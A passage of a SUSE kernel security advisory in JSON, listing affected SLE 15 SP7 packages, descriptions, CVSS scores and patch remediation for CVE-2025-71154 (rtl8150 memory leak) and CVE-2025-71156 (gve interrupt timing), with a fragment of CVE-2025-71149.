"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-71149"
},
{
"cve": "CVE-2025-71154",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71154"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: usb: rtl8150: fix memory leak on usb_submit_urb() failure\n\nIn async_set_registers(), when usb_submit_urb() fails, the allocated\n async_req structure and URB are not freed, causing a memory leak.\n\n The completion callback async_set_reg_cb() is responsible for freeing\n these allocations, but it is only called after the URB is successfully\n submitted and completes (successfully or with error). If submission\n fails, the callback never runs and the memory is leaked.\n\n Fix this by freeing both the URB and the request structure in the error\n path when usb_submit_urb() fails.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71154",
"url": "https://www.suse.com/security/cve/CVE-2025-71154"
},
{
"category": "external",
"summary": "SUSE Bug 1257163 for CVE-2025-71154",
"url": "https://bugzilla.suse.com/1257163"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-71154"
},
{
"cve": "CVE-2025-71156",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71156"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ngve: defer interrupt enabling until NAPI registration\n\nCurrently, interrupts are automatically enabled immediately upon\nrequest. This allows interrupt to fire before the associated NAPI\ncontext is fully initialized and cause failures like below:\n\n[ 0.946369] Call Trace:\n[ 0.946369] \u003cIRQ\u003e\n[ 0.946369] __napi_poll+0x2a/0x1e0\n[ 0.946369] net_rx_action+0x2f9/0x3f0\n[ 0.946369] handle_softirqs+0xd6/0x2c0\n[ 0.946369] ? handle_edge_irq+0xc1/0x1b0\n[ 0.946369] __irq_exit_rcu+0xc3/0xe0\n[ 0.946369] common_interrupt+0x81/0xa0\n[ 0.946369] \u003c/IRQ\u003e\n[ 0.946369] \u003cTASK\u003e\n[ 0.946369] asm_common_interrupt+0x22/0x40\n[ 0.946369] RIP: 0010:pv_native_safe_halt+0xb/0x10\n\nUse the `IRQF_NO_AUTOEN` flag when requesting interrupts to prevent auto\nenablement and explicitly enable the interrupt in NAPI initialization\npath (and disable it during NAPI teardown).\n\nThis ensures that interrupt lifecycle is strictly coupled with\nreadiness of NAPI context.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
